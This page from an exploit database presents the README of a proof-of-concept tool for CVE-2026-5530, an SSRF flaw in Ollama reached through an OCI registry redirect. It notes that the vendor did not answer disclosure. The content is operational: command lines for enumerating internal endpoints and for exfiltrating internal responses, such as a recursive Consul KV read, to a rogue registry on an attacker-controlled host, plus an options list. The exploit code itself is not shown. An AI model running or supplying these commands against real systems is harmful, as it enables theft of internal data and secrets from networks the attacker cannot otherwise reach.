Share
## https://sploitus.com/exploit?id=157E1612-62BB-560A-A102-9D72335F5D72
# CVE-2026-5530

Ollama SSRF via OCI registry redirect with full response exfiltration.

Writeup: https://davidrochester.com/posts/cve-2026-5530

## Disclosure

Ollama was contacted multiple times with no response.

## Usage

Three modes: enum, exfil, and probe.

### Enum

Finds live internal endpoints reachable from the Ollama host.

```
python3 poc.py targets.txt --registry-host 
```

### Exfil

Exfiltrates SSRF responses when you know the response size.

```
python3 poc.py http://internal:8500/v1/kv/?recurse --exfil --size 960 --registry-host 
```

### Probe

Binary searches for the response size automatically, then exfils.

```
python3 poc.py http://internal:8500/v1/kv/?recurse --probe --registry-host 
```

## Options

```
target              URL or file of URLs (one per line, # for comments)
-p, --port          rogue registry port (default: 9999)
--exfil-port        exfil registry port (default: 10000)
--exfil             exfil mode, requires --size
--probe             binary search for size, then exfil
--size              Content-Length (required with --exfil)
--registry-host     your attacker IP/hostname that Ollama can reach
--ollama            Ollama API URL (default: http://127.0.0.1:11434)
```